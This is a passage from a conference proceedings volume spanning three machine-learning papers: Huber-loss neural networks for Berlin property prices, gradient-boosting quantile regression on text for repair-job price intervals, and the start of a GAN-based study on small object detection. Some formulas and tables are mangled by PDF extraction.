In Mean squared error the gradient decreases whenever the loss gets closer to the minima, which makes it more precise, but in Huber loss whenever the gradient decreases it curves around the minima. 3.2 Recurrent Neural Network Our model for the Recurrent Neural Network is displayed in Fig. 10. RNN is also considerably a good choice for house price prediction, as this type of model is used for sequential data. Problems: • Inputs and outputs which has different shape • Doesn’t share features learnt across different position In RNN, the parameters it uses for each time step are shared, so there will be a set of parameters which we will discuss now, But the parameters governing the connection from x to the hidden layer will be some set of parameters, we will be writing them as Wax and is the same parameters Wax that is used for every time step. The activations, the horizontal connections will be governed by some set of parameters Waa and for every time step. So, in this Recurrent Neural Network, when making the prediction for y , it gets the information not only from x but also the information from x and x because the information on x can pass through this way to help to prediction with y .
Fig. 10. RNN forward propagation
Huber Loss and Neural Networks Application
249
The activations in the choice of RNN are tanh and sometimes ReLU are also used although the tanh is a common choice, and we have other ways of preventing the vanishing gradient problems. Depending on output function ‘Y ’, if binary classification then we should have used sigmoidal function, SoftMax or K-way classification. Simplified RNN notation. a = g(Waa a + Wax x + ba Let’s say, a → 100D, x → 10000D And it is stacked horizontally, then Waa → (100, 100) Wax → (100, 10000) Wa → (100, 10100) ⎤ a ⎢ ⎥ Similarly, a , x = ⎣ ... ⎦ ⎡
a
x
= Waa a + Wax x xt Therefore, more generally we end up with this equation, a = g Wax x + Waa a + ba for tanh/relu. y = g(Waa a + by ) for Sigmoidal. To perform Back Propagation, we need cost/cross entropy. L yi , y = −y log yi − 1 − y log(1 − yi ) This is for an element in the sequence. Overall Function, ty y t , y t , This will be the equation for Back Propagation L(yi , y) = t=1 L i through time. Here, we have four types of RNN: Finally, [Waa , Wax ]
1. 2. 3. 4.
One-to-One One-to-Many Many-to-One May-to-Many For our use case, for price prediction we have used Many-to-One. Our RNN neural network snippet looks like this.
250
A. I. Iliev and A. Anand
Fig. 11. RNN neural network
As we can see from the code snippet displayed in Fig. 11, we have our first layer as a lambda layer. We have used lambda layer to use the arbitrary expression as a layer during our experimentation. These layers are generally used for a sequential model. In our use case we had a simple expression to experiment with. Hence, we used it. With this model we achieved mean squared error as low as 0.089 and mean absolute error as 0.222.
Fig. 12. Lose curve simple RNN
This graph in Fig. 12 shows us how the model learns from every epoch, and we see that the model improved in a very less epochs and got stabilised later. We have used hyperparameter tuning for the learning rate in our RNN model, this way we can control the speed with which the model learns as evident from Fig. 13.
Fig. 13. RNN learning rate
Huber Loss and Neural Networks Application
251
Fig. 14. Loss curve RNN using hyperparameter tuning
After implementing this, we can see that the model is improving by looking at the way it is learning in this graph Fig. 14. When we train a model, we expect a smooth bell-shaped curve which we achieved with this experiment. 3.3 Hybrid Neural Network In our last neural network, we have worked on the hybrid neural network [10, 11] with the combination of one lambda layer, one conv1d, two LSTM layers, two Simple RNN layers, three dense layers, and one final output dense layer, as shown in Fig. 15. We wanted to experiment with the hybrid model and see the performance of it, with our data and compare how it will work compared to others. In the hybrid model we have also used hyperparameter for the learning rate for Adam optimizer.
Fig. 15. Hybrid neural network
252
A. I. Iliev and A. Anand
Most of the layers which are been used here are being explained in the above Sects. 3.1 and 3.2. The metrics we have used for calculation the loss for all the above models were mean squared and mean absolute errors, and the values we have got from this neural net was 0.12 and 0.26. The loss curve for this hybrid model was also impressive as shown in Fig. 16, as we see there is no noise in its trends.
Fig. 16. Loss curve hybrid neural network
4 Results The main objective of this paper was to find the best neural network for the real estate market in Berlin, Germany. We have worked on multiple models and tried to improvise the models using different loss functions, figuring the best delta value for Huber loss function, using hyperparameter tuning for Adam optimizer. In this section, we have discussed and tabulated the results and the tests we have done. We have taken the properties online in the market and tried to compare the models on how they are efficient on the real-world data. We have considered doing various pre-processing steps to make the data suitable for the models to learn from and we have explained them briefly in Sect. 2 of the paper. Different models and their respective errors are shown in Table 1:
Huber Loss and Neural Networks Application
253
Table 1. Metrics comparison for models Model
Mean squared error
Mean absolute error
Deep Neural Nets with MSE loss function
0.177
0.271
Deep Neural Nets with Huber Loss function
0.215
0.3163
Simple RNN
0.102
0.235
Simple RNN with hyperparameter tuning Adam Optimizer
0.106
0.241
Hybrid Neural Network
0.124
0.268
We have also discussed about the loss curve of these models in Sect. 3, to understand how the models are learning. A comparison of the test data for each model is shown in Table 2. Table 2. Test data comparison Test data
Model 1
Model 2
Model 3
Model 4
Model 5
8.545
8.584
8.782
8.598
8.530
8.613
8.370
8.283
8.475
8.398
8.261
8.434
8.694
8.577
8.632
8.408
8.253
8.412
7.717
7.777
7.390
7.866
7.861
7.909
7.740
7.651
7.719
7.783
7.664
7.743
NOTE: These are the log values directly from the model which has normalized log values
Here, in this table. • • • • •
Model 1 = Deep Neural Nets with MSE loss function Model 2 = Deep Neural Nets with Huber Loss function Model 3 = Simple RNN Model 4 = Simple RNN with hyperparameter tuning Adam Optimizer Model 5 = Hybrid Neural Network
The number in the tables are the property price per square feet. And the values are the log values. These results are straight from the model on the test data, we have divided our data into 80% train and 20% validation. And in the pre-processing, we have normalised the data to get the better performance out of the model. And we have tabulated the log values directly from the model. In this section we take the real time data from online and try to find which model works best on them. These are the real properties which we used to test our model.
254
A. I. Iliev and A. Anand
Fig. 17. Online real time property data
Note: In Fig. 17 we have taken the log values for living_sqm field because our model is trained with log values. To do that, we just need to use log1p from the NumPy library. Here, we will compare two ANN models, two RNN models and Hybrid models separately just to observe how the changes are behaving.
Fig. 18. Comparison of ANN models
In the graph Fig. 18, we have plotted the online price, deep Ann model price, and a model with Huber loss.
Huber Loss and Neural Networks Application
255
It is evident in the plot that Deep ANN model performs a lot better than the Deep Neural Network Model. As we have explained in the Sect. 3.1 that Huber loss is more robust to the outliers than the usual MSE loss function. We can see for the property 9 and 15 that the online prices are high, and the model performs well for the outliers, which here means that the property is highly priced than usual.
Fig. 19. Comparison of RNN and hybrid neural network
This graph in Fig. 19 is a comparison of RNN and Hybrid model. In this figure, we can clearly observe that the hybrid model with Huber loss is more accurate compared to the conventional neural networks.
5 Conclusion The main object of this paper was to experiment on neural nets, optimizers, and loss functions to see which suit the best for property price prediction regression problem statement. And we have considered all the combination and discussed the results in Sect. 5. From all the experiments carried out on this topic, we can conclude that. • hyperparameter tuning the learning rate of Adam optimizer • Using the Huber loss function with delta value 1.75 • Using Hybrid Neural Network is the best combination for this use case.
256
A. I. Iliev and A. Anand
References 1. Kauskale, L.: Integrated approach of real estate market analysis in sustainable development context for decision making. Procedia Eng. 172, 505–512 (2017) 2. Jha, S.B.: Machine learning approaches to real estate market prediction problem: a case study arXiv:2008.09922 (2020) 3. Tabales, J.M.N.: Artificial neural networks for predicting real estate prices. Revista De Methodos Cuantitativos para la economia y la empresa 15, 29–44 (2013) 4. Hamzaoi, Y.E., Hernandez, J.A.: Application of artificial neural networks to predict the selling price in the real estate valuation. In: 10th Mexican International Conference on Artificial Intelligence, pp. 175–181 (2011) 5. Kauko, T., Hooimaijer, P., Hakfoort, J.: Capturing housing market segmentation: an alternative approach based on neural network modelling. Hous. Stud. 17(6), 875–894 (2002) 6. Fukumizu, K.: Influence function and robust variant of kernel canonical correlation analysis. Neurocomputig, 304–307 (2017) 7. Rahimi, I., Bahmanesh, R.: Using combination of optimized recurrent neural network with design of experiments and regression for control chart forecasting. Int. J. Sci. Eng. Invest. 1(1), 24–28 (2012) 8. Cook, D.F., Ragsdale, C.T., Major, R.L.: Combining a neural network with a genetic algorithm for process parameter optimization. Eng. Appl. Artif. Intell. 13, 391–396 (2000) 9. Kingma, D.P.: Adam: a method for stochastic optimization. In: International Conference on Learning Representations (2015) 10. Lee, E.W.M.: A hybrid neural network model for noisy data regression. IEEE Trans. Cybern. 34, 951–960 (2004) 11. Williamson, J.R.: Gaussian artmap: a neural network for fast incremental learning of noisy multidimensional maps. Neural Netw. 9(5), 881–897 (1996)
Text Regression Analysis for Predictive Intervals Using Gradient Boosting Alexander I. Iliev1,2(B) and Ankitha Raksha1 1 SRH Berlin University, Charlottenburg, Germany
[email protected] 2 Institute of Mathematics and Informatics, Bulgarian Academy of Sciences, Sofia, Bulgaria
Abstract. In this paper, we aim to explore text data analysis with the help of different methods to vectorize the data and carry out regression methods. At present, we have a lot of text categorization techniques, but very few algorithms are dedicated to text regression. But many regression models predict only a single estimated value. However, it’s more efficient to predict a numerical range than a single estimate, since we can be more sure that the true value will be within the range rather than considering the estimated value as the true value. We aim to combine both these techniques in this paper. The goal of this paper is to collect text data, clean the data, and create a text regression model to find the best-suited algorithm that could be used in any situation, through the use of quantile regression. Keywords: Text analysis · tf-.idf · word2vec · GloVe · Text regression · Word vectorization · Quantile · Gradient boosting · Natural language processing
1 Introduction With the help of Natural Language Processing (NLP) and its components, we can organize huge amounts of data. NLP is a powerful AI method for communicating with an intelligent system using natural language. We can perform numerous automated tasks and solve a wide range of problems, such as automatic summarization, machine translation, entity recognition, speech recognition, and topic segmentation. Since machine learning algorithms are not able to understand text, we need a way to convert the text into numbers so that the algorithm can understand the data that is sent to the model. After the data is pre-processed and cleaned, we perform a process called vectorization. In machine learning, most algorithms work with numerical data. Therefore, we need to find a way to convert the text data into numbers so that it can be incorporated into the machine learning models. This is called word vectorization, and the numerical form of the words is called vectors. To gain the confidence of decision makers, it is often not necessary to present a single number as an estimate, but to provide a prediction range that reflects the uncertainty inherent in all models.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 257–269, 2023. https://doi.org/10.1007/978-3-031-28073-3_18
258
A. I. Iliev and A. Raksha
2 About the Data The data was collected from Plentific GmbH in the last two years which accommodates around 170,000 records. The data consisted of various textual data that described the specificity of a home repair job that has been posted on the marketplace such as category, service, type, job description, emergency tag type which were the feature vectors for predicting the price for that repair job which is our target value.
Fig. 1. Histogram of the repair job and their price value for the maximum value of 500
From the histogram shown in Fig. 1 of the repair job and their prices, we see that the distribution of repair job prices has been spread from a very little amount as in 10 lb to a very large amount of 500 lb. 2.1 Data Preparation Data preparation involves cleaning the data, which is one of the simplest yet most important steps in the entire data modelling process. How well we clean and understand the raw input data and prepare the output data will have a big impact on the quality of the results, even more than the choice of model, model tuning, or trying different models. All text data in its original form contains a lot of unnecessary data, which we call noisy data or dirty data, and which must be cleaned. Failure to do so can result in skewed data that ultimately leads to the organization making poor decisions. Cleaning text is particularly difficult compared to cleaning numbers because we cannot perform any of the usual statistical analysis that we can with numerical data. Steps in text cleaning: a) b) c) d)
Removal of null values in the data. Convert all the words into lower case. Remove numbers. Remove newline character
Text Regression Analysis for Predictive Intervals
259
e) Remove any HTML tags f) Remove punctuations, limit to a certain word/s where there is an actual message. g) Lemmatization: bringing a word into its root format. To remove outliers from the dataset and to reduce the variance among different repair jobs, we have tried to limit the accepted price value from 45 to 125 lb as in Fig. 2. Initially, we had almost 170,000 data records but after removing outliers we have 115,000 data left in our dataset, which comprises almost 70% of data.
Fig. 2. Histogram of the repair job and their price value for the maximum value of 125 and minimum of 45
3 Literature Survey For our case, we had to understand insights from previous works for text regression. One such study includes considering different text corpora to predict the age of the author that’s written using a linear model and text features [1]. There was another study that used much more complex modeling like Convulsion neural networks (CNN) for text regression for financial analysis [2]. A similar study was done for financial documents pertaining to stocks volatility to analyze different documents and predict risk using Support Vector Regression [3]. In another study, the authors have proposed a text regression model based on a conditional generative adversarial network (GAN) [4] the model works with unbalanced datasets of limited labeled data, which align with real-world scenarios [5]. Having both text data and metadata sent into the same model is a unique concept of having two different data structures being combined, this was beautifully explained in predicting revenues for movies [6]. This paper shows a non-linear method based on a deep convolutional neural network [7]. Another paper suggests the use of logistic regression and its advantages to text categorization [8]. TF-IDF has its mathematical implications that provide the notion of the probabilityweighted amount of information (PWI). To understand how TF-IDF weights can help give a relevant decision, the authors have come up with a model that combines the local relevance with document-wide relevance decision [9]. Another method for word
260
A. I. Iliev and A. Raksha
representation is word2vec, which is originally done by the Google developers to have an efficient word representation in an N-d vector space and have illustrated two different models: Skip-gram and Continuous bag of words [10]. By extending this study, the author of the paper has discussed emerging trends that come with word2vec, with all different operations that can be carried out on words to find out relationships [11] and how it can be applied to big text contents [12]. Like word2vec we have GloVe, which is short for Global Vectors, founded by Stanford researchers who have shown that the result is a combination of global matrix factorization and local context window methods [13]. Creating a model on top of the GloVe baseline model has been done to get better results [14]. There is also a study which shows a way to combine both word2vec and Glove model [15]. Decision trees suit better to fit nonlinear non-normal data [16], and a combination of many models together in ensembling learning increases the accuracy of the model [17]. Gradient Boosting is a greedy function where it is an inclusive model with loss functions like least square, least absolute deviation, and Huber-M [18]. This paper provides conditions that point to a quantile regression model that proposes the conversion of the data that disregards the fixed effects by assuming of location shifters [19]. There were many attempts for predicting intervals like fuzzy intervals [20], and machine learning approach for artificial and real hydrologic data sets [21].
4 Word Vectorization Word vectorization schemes are needed in machine learning for the simple reason that the encoding scheme we’re most familiar with as humans and the alphabet tell us very little about the nuances of the word it represents. The need for good embedding schemes increases because we cannot simply feed a network the binary data from ASCII or something that’s been hot coded based on an extensive vocabulary because these soon balloon into unacceptably large dimensions that no neural network can easily handle. Neural networks for natural language processing are well known for the fact that their performance depends almost exactly on how good their word embedding is. The goal of word embedding, then, is to solve all these problems and provide the model with a learning method that allows it to place words in hyperspace, where their position tells it something about the word and its relationship to all the other words in its vocabulary. The goal of word embedding is: • To reduce dimensionality • To use a word to predict the words around it • Inter-word semantics must be captured. There are many word vectorization techniques out there, but we want to focus on the following ways:
Text Regression Analysis for Predictive Intervals
261
4.1 Term Frequency-Inverse Document Frequency (TF-IDF) Term frequency-inverse document frequency (TF-IDF) is a method whose main purpose is to introduce the concept of semantic meaning of words and to consider the meaning of words in a document. This is done through a statistical analysis of word frequencies. This is represented by the following formula: TF(w)* IDF(w). Where TF stands for term frequency and IDF stands for inverse document frequency and is formulated as follows: TF(w) = (number of occurrences of a word in the document) / (total number of words in the document). IDF(w) = log (number of documents / number of documents containing the word w). 4.2 Word2Vec Word2Vec is a method for generating word embeddings. It converts words into vectors, and with vectors we can perform several operations, such as adding, subtracting, and calculating distance, so that a relationship between words is preserved. Unlike TF-IDF, word2vec and other encoding methods use a neural network model that provides an N-d vector for the words. Training the word2vec model is also very resource intensive, as it requires a large amount of RAM to store the vocabulary of the corpus. In simple terms, word2vec tries to consider words with similar contexts as similarly embedded. Word2vec, or any other vector embedding method using a neural network trained with different corpora, has “rightly” gained knowledge about words through the context of similarity with surrounding words. There are two types: a) Continuous Bag of Words (CBOW): a word is predicted based on the surrounding words and as an example shown in Fig. 3, we are trying to predict the word ‘Jumps’ from all the other words in that sentence. b) Skip-Gram: one word is used to predict the surrounding words and as an example shown in Fig. 4, we are trying to predict all the other words in that sentence from the word ‘Jumps’.
Fig. 3. Continuous bag of words example
262
A. I. Iliev and A. Raksha
Fig. 4. Skip-gram model example
4.3 GloVe GloVe is an abbreviation for Global Vector. The difference between Word2Vec and GloVe is that in Word2Vec we only considered the local presence of a word in the dataset. GloVe is a word representation scheme that aims to extract semantic relations between words in their embeddings. Thus, GloVe aims to capture the meaning of the word in the embedding by explicitly recognizing the probabilities of co-occurrence, and this is empirically demonstrated in the paper, as in Table 1: Table 1. GloVe co-occurrence matrix example
P(k|’ice’)
k = ‘solid’
k = ‘gas’
k = ‘water’
k = ‘fashion’
1.90E-04
6.60E-05
3.00E-03
1.70E-05
P(k|’steam’)
2.20E-05
7.80E-04
2.20E-03
1.80E-05
P(k|’ice’) / P(k|’steam’)
8.90E+00
8.50E-02
1.30E+00
9.60E-01
The words ‘ice’ and ‘steam’ are compared to various probe words like ‘gas’, ‘water’, ‘solid’,’fashion’. Now we can see that the word ‘ice’ is more related to ‘solid’ than it is to ‘gas’ and the converse is true for ‘steam’ as seen by the ratios calculated in the last row. Both terms have similar large values with water, and on the other hand have very small values in the context of the word ‘fashion’ [13]. All these aims to argue the point that embedding should be built not on just the word probabilities but the co-occurrence probabilities within the context and this is what is going to be in the loss function. The essence of GloVe is to build a matrix from these probabilities and subsequently learn a vector representation of each word. And here we arrive at the loss function in its entirety J = f (Xij )(wiT w j + bi + b j − log(Xij ))2 where f (Xij ) = weighting function wiT w j = dot product of input/output vectors. bi + b j = bias term. Xij = number of occurrences of j in context i.
Text Regression Analysis for Predictive Intervals
263
5 The Intuition of Text Regression We have all heard of text classification, where a given text or sentence is divided into different classes, thus predicting a class name when a new text is present. But in today’s world, there is very little structured data, the rest is unstructured, and this is where text data comes in. There are cases where we need to predict a number for a given text, such as a property description and predicting the price of the property, or an article and predicting how many “likes” it can get, or an article (or story) and predicting the age of the author based on the vocabulary used [1]. These all seem to be real-world examples, and we may need to look ahead a bit to grasp the importance of text regression. 5.1 Gradient Boosting Regressor Gradient Boosting Regression is a boosting algorithm with serial implementation of decision trees. We trained two models, one for predicting a lower bound and the other for the upper bound, by providing values for the quantile or “alpha” to create an interval. Predicting a numerical range by this method can be very useful in situations where we cannot rely one hundred percent on a single number, but rather on a range. This is very important in our case because with textual data such as the repair order description, there are many variations within the description that can only be properly understood by the contractor based on their experience. For this reason, we chose to use quantile regression rather than just linear regression. Gradient boosting regressors have been shown to fit and perform better on complex data sets. Another reason for choosing this algorithm is that it provides intrinsic quantile prediction functionality through its loss function. 5.2 Quantile Regression Model Before we dive into understanding a quantile regression model, we must first understand the meaning of quantiles. In general, quantiles are just lines that divide the data into equal groups. Percentiles are simply quantiles that divide the data into a hundred equal groups. For example, when we talk about a 75th quantile, it generally means that 75% of the data is below that point. The quantiles are only known from the distribution of the data provided to the model. Linear regression, or so-called ordinary least squares (OLS), assumes that the relationship between the input variable X and the output label Y can be transformed into a linear function. Y = θ0 + θ1 X1 + θ2 X2 + . . . + θp Xp + ε where Y is the dependent variable, X 1 .. Are the independent variables, θ0…p are the coefficient and is the bias term. The objective loss function is a squared error represented as:
264
A. I. Iliev and A. Raksha
L = (y − X θ )2 where y is the actual value and Xθ is the predicted value. With quantile regression, we have an extra parameter τ, which talks about the τth quantile of our target variable Y that we’re interested in our model, where τ ∈ (0, 1) and our loss function becomes: L = τ y − y , if y − y ≥ 0 or L =(τ − 1) y − y , if y − y < 0 where τ is quantile, L is the quantile loss function, y is the actual value, y’ is the predicted value. We want to penalize the loss function when the percentile is low, but the prediction is high, and when the percentile is high, but the prediction is low. What is meant by this is that we use the quantile loss to predict a percentile within which we are confident that the true estimate lies. The first condition in the quantile loss function indicates when y-y’ ≥ 0, which means that the value predicted by our model is low, which is good if we want to predict the lower percentiles, but we want to penalize the loss if the predicted value is much higher than the value. y-y’ < 0 indicates that our prediction is high, which is good for higher percentiles, but we want to penalize the loss if the predicted value is much lower than the true value. The quantile loss differs depending on the quantile evaluated, so negative errors are penalized more when we specify higher quantiles, and positive errors are penalized more for lower quantiles. Now that we know quantile regression, we need to see how to apply it in our scenario. After some research, we saw that gradient boosting regression has an option to use quantile regression, which simplifies the process. This is easily accomplished by specifying loss = “quantile” with the desired quantile in the alpha. 5.3 Benchmarking the Model In order to evaluate the model performance, and how well the interval range fits the true value, we have decided to consider the frequency of the true value captured in the range. In other words, the accuracy of the model is the number of times the actual priced value is in the predicted interval over the number of records of data. 5.4 Model Comparisons We have considered only three popular methods of text vectorization for now i.e.TF-IDF, Word2Vec and GloVe. In Table 2 we show the statics of those methods:
Text Regression Analysis for Predictive Intervals
265
Table 2. Method comparison Methods
Test accuracy
Training time
TF-IDF
75.10%
3 min
Word2Vec
75.50%
10 min
GloVe
74.60%
6 min
The values given in the table were trained with gradient boosting models with quantile values 0.8 and 0.2 to understand how different methods behave. We also see that the more time required to train the model, the higher the accuracy. However, the trade-off is always between the accuracy and the computational time because if training the data in the production environment is computationally expensive, it will be questioned because it would cost a lot of money on the production side as well. There, it is more optimal that we achieve good accuracy with minimal cost. Note that the training time may vary depending on the size of the dataset and the instances used to train the models. In our case we used a GPU instance g4dn.xlarge, but again it is all a matter of resources and optimization. To keep the training time for the different tests as low as possible, we decided to use the model with the TFIDF vectorization method to test the models with different quantile values, as shown in Table 3: Table 3. Quantile comparisons Lower quantile
Upper quantile
Testing accuracy
Interval difference [in pounds]
0.2
0.8
75%
28
0.18
0.82
78%
30
0.15
0.85
82%
34
0.1
0.9
89%
44
The above table shows the data with different quantile levels and the test accuracy, as well as the interval difference (in pounds) between the lower and upper limits. From the above values, we can see that there is a clear trade-off between the accuracy achieved and the interval difference, as it is very easy to capture more of the actual value within the range by simply extending it further. However, this is not our goal, as a large range is not suitable in the real world. What we need is a decently narrow range with good detection accuracy. 5.5 Hyperparameter Tuning To understand the model even better, and since we had a large enough data set, we tried to increase the ratio of training to test as test data from 20% to 40%. The result of this
266
A. I. Iliev and A. Raksha
experiment is quite interesting, as it yielded similar accuracy to the 85% to 20% split. Before reaching a conclusion, we had to test different values for the parameters of the gradient boosting regression. We had chosen n_estimators as a parameter to vary and compare the results. n_estimators show the number of trees formed in the model. The following Table 4 shows different values for n_estimators: Table 4. N_estimators hyperparameters n_estimators
Test accuracy
40
82.66%
60
82.78%
80
82.86%
100
83.20%
120
83.08%
140
82.93%
160
82.92%
We can conclude that the change in accuracy is very minimal and that it increases/decreases in decimal points. The accuracy increases around 100 trees and then decreases again. A special feature of the gradient boosting trees is that they are based on the learning rate and the average price value. Since the target value is mostly the same even for different repair jobs, this also affects the overall value when we try to build the trees.
6 Result In Table 5, we see an example of the prediction of the lower and upper limits for the repair order, which are called “lower” and “upper” values in the diagram, while “price” is the actual value in the test data. Table 5. Results id
Price
Upper
Lower
1
90
58.821936
90.234450
2
85
49.699136
97.002349
3
84
59.973129
94.544094
4
80
65.785190
93.253945
5
95
60.164752
90.126343
For our model, we need to show the prediction error on the test set. Measuring the error from a prediction interval is more difficult than predicting a single number. We
Text Regression Analysis for Predictive Intervals
267
can easily determine the percentage of cases where the true value was captured in the interval, but these values can easily be increased if we increase the interval boundaries. Therefore, we need to show the absolute error calculations to account for this, as in Table 6: Table 6. Absolute error calculations absolute_error_lower
absolute_error_upper
absolute_error_interval
Count
45343.000
45343.000
45343.000
Mean
18.749340
20.576137
19.662739
Std
15.600487
13.186537
6.646751
Min
0.000465
0.000292
2.152931
25%
6.298666
9.967990
14.898903
50%
13.917017
19.058457
18.511
75%
27.664566
29.542923
22.241346
Max
75.874350
67.695534
57.763181
We see that the lower prediction has a smaller absolute error (with respect to the median) than the upper prediction. It is interesting to note that the absolute error for the lower bound in terms of the mean and standard deviation is almost the same as the absolute error for the upper bound, which in turn shows that the upper bound and the lower bound are almost equally far from the true value. 6.1 Inference From the tests performed above, we can conclude that the accuracy of the model is not drastically changed even when increasing/decreasing the test-train size or the n_estimator values, because the variance in the data set is very small. To get this right, we added the outliers back into our data set to see if there was any additional variance added to the data set. But that did not change anything, and the model returned about 78 percent on the test data. This confirms that the variance in the data set is very small and that the power changes only slightly with each change.
7 Scope of Future Improvements Building a model never has an end, as there will always be new requirements, adjustments and improvements that need to be reconciled with the product development process. The main concern is to keep re-training the model as we collect more and more data over time. The reason for this is that new data brings its own variance and deviation that could be affected or incorrectly predicted by using a previous model.
268
A. I. Iliev and A. Raksha
We have listed down use cases of improvements for this model in the future: a) Try it with various other machine learning algorithms or neural networks by altering the loss function to give an interval instead of a single estimated value. b) Add location data in terms of GPS coordinates to see how the price changes with location.
8 Conclusion The main goal of this work was to experiment with different word vectorization methods that can be used in the gradient boosting engine to take advantage of its inherent functionality of quantile regression and to find out how text data behaves with respect to regression. From all the experiments that have been conducted on this topic, we can conclude that: • We have been able to successfully show that we can predict numerical intervals for arbitrary text data. When a machine learning model predicts a single number, it creates the illusion of a high degree of confidence in the entire modelling process. However, since one of the models is only a rough approximation, we need to convey the uncertainty in the estimates. • Even though the tree models can be robust, it always depends on the problem we want to solve and the input data for the model. Comparison of different methods TF-IDF, Word2Vec, GloVe for converting words to vectors has helped to obtain important text features from the input data.
References 1. Nguyen, D., Smith, N.A., Rose, C.P.: Author age prediction from text using linear regression. In: Proceedings of the 5th ACL-HLT Workshop on Language Technology for Cultural Heritage, Social Sciences, and Humanities (2011) 2. Dereli, N., Saraclar, M.: Convolutional neural networks for financial text regression. In: Proceedings of the 57th Annual Meeting of the Association for Computational Linguistics: Student Research Workshop (2019) 3. Kogan, S., Levin, D., Routledge, B.R., Sagi, J.S., Smith, N.A.: Predicting risk from financial reports with regression. In: Human Language Technologies: The 2009 Annual Conference of the North American Chapter of the ACL (2009) 4. Aggarwal, A., Mittal, M., Battineni, G.: Generative adversarial network: an overview of theory and applications. Elsevier (2020) 5. Li, T., Liu, X., Su, S.: Semi-supervised text regression with conditional generative adversarial networks (2018) 6. Joshi, M., Das, D., Gimpel, K., Smith, N.A.: Movie reviews and revenues: an experiment in text regression. Language Technologies Institute (n.d.)
Text Regression Analysis for Predictive Intervals
269
7. Bitvai, Z., Cohn, T.: Non-linear text regression with a deep convolutional neural network. In: Proceedings of the 53rd Annual Meeting of the Association for Computational Linguistics and the 7th International Joint Conference on Natural Language Processing (Short Papers), pp. 180–185 (2015) 8. Genkin, A., Lewis, D.D., Madigan, D.: Sparse logistic regression for text categorization (n.d.) 9. Chung Wu, H., Fai Wong, K., Kui, L.K.: Interpreting TF-IDF term weights as making relevance decisions. ACM Trans. Inf. Syst. 26, 1–37 (2008) 10. Mikolov, T., Chen, K.C., Dean, J.: Efficient estimation of word representations in vector space (2013) 11. Church, K.W.: Emerging trends Word2Vec. Nat. Lang. Eng. 155–162 (2016) 12. Ma, L., Zhang, Y.: Using Word2Vec to process big text data (2016) 13. Pennington, J., Socher, R., Manning, C.D.: GloVe: global vectors for word representation (n.d.) 14. Ibrahim, M., Gauch, S., Gerth, T., Cox, B.: WOVe: incorporating word order in GloVe word embeddings (n.d.) 15. Shi, T., Liu, Z.: Linking GloVe with word2vec (2014) 16. Chowdhurya, S., Lin, Y., Liaw, B., Kerby, L.: Evaluation of tree based regression over multiple linear regression for non-normally distributed data in battery performance (2021) 17. Dietterich, T.G.: Ensemble methods in machine learning. In: Kittler, J., Roli, F. (eds.) MCS 2000. LNCS, vol. 1857, pp. 1–15. Springer, Heidelberg (2000). https://doi.org/10.1007/3540-45014-9_1 18. Friedman, J.H.: Greedy function approximation: a gradient boosting machine (2001) 19. Canay, I.A.: A simple approach to quantile regression for panel data. Econ. J. 14, 368–386 (2011) 20. Sáez, D., Ávila, F., Olivares, D., Cañizares, C., Marín, L.: Fuzzy prediction interval models for forecasting renewable resources and loads in microgrids. IEEE Trans. Smart Grid 6, 548–556 (2015) 21. Shrestha, D.L., Solomatine, D.P.: Machine learning approaches for estimation of prediction interval for the model output, 225–235 (2006)
Chosen Methods of Improving Small Object Recognition with Weak Recognizable Features Magdalena Stacho´ n1 and Marcin Pietro´ n2(B) 1
Institute of Computer Science, AGH University of Science and Technology, Cracow, Poland 2 Institute of Electronics, AGH University of Science and Technology, Cracow, Poland [email protected]
Abstract. Many object detection models struggle with several problematic aspects of small object detection including the low number of samples, lack of diversity and low features representation. Taking into account that GANs belong to generative models class, their initial objective is to learn to mimic any data distribution. Using the proper GAN model would enable augmenting low precision data increasing their amount and diversity. This solution could potentially result in improved object detection results. Additionally, incorporating GAN-based architecture inside deep learning model can increase accuracy of small objects recognition. In this work the GAN-based method with augmentation is presented to improve small object detection on VOC Pascal dataset. The method is compared with different popular augmentation strategies like object rotations, shifts etc. The experiments are based on FasterRCNN model. Keywords: Deep learning · Object detection · Generative Adversarial Networks · CNN models and VOC Pascal dataset
1
Introduction
Computer vision relays deeply on object detection including such domains as self-driving cars, face recognition, optical character recognition or medical image analysis. Over the past years, great progress has been made with the appearance of deep convolutional neural networks. The first, based on regional nomination methods, such as the R-CNN model family [5], the other - one-stage detector, which enables real-time object detection with methods such as YOLO [6] or SSD [7] architectures. For those models very impressive results have been achieved for high resolution, clear objects, however, this process does not apply to very small objects. The deep learning models enable creating low level features, which afterwards are combined into some higher level features that the network aims to detect. Due to significant image resolution reduction, small object features, c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 270–285, 2023. https://doi.org/10.1007/978-3-031-28073-3_19
Chosen Methods of Improving Small Object Recognition
271
extracted on the first layers disappear in the next layers and are not affected by detection and classification scopes. Their poor quality appearance makes impossible to distinguish them from the other categories. Small object accurate detection is crucial for many disciplines and determines their credibility and effective usage. Small traffic signs and objects detection influence the self-driving car safety rules. In medical image diagnosis, a few pixel size tumor detection or chromosome recognition enables early treatment [13]. To make full use of satellite image inspection many small objects need a precise annotation. Taking some of those examples into account, the small objects are present in every computer vision aspect, and they should be treated with special attention, as they constitute one of the weakest parts of current object detection mechanisms. In this work few approaches were tested and compared how they can help in improving detection of small objects. First the most popular methods were taken based on augmentation techniques. In the next stage the efficiency of the perceptual GAN was tested [3]. Perceptual GAN was trained on data from unbalanced original dataset and data generated by DCGAN [9]. These approaches were tested on VOC Pascal dataset [4] with Faster R-CNN model [1] with VGG [11] architecture as a backbone. The VOC Pascal dataset consists mainly of big objects, which enlarge the small object accuracy disparity, as the model focuses mainly on medium and big objects. Moreover, there is a significant disproportion in class count depending on object size, which results in a lack of diversity and location of small objects. The experiments face three problematic aspects of small object detection: the low number of samples, their lack of diversity, and low features representation. The first phase involves dataset preparation by augmenting classes for small objects from the VOC Pascal dataset with several oversampling strategies. The original objects used for the oversampling method are enhanced by the ones generated by Generative Adversarial Network [14,26,27], based on the original paper [9] customized for the training purpose. The augmented dataset is introduced to the Faster R-CNN model and evaluated on original groundtruth images. Secondly, for a selected class from training augmented dataset with low classification results, FGSM attack is conducted on objects as a trial to increase the identification score. Finally, in order to cope with poor small object representation, the enhanced dataset is introduced to Perceptual GAN, which generates super-resolved large-object like representations for small objects and enables higher recognizability.
2
Related Works
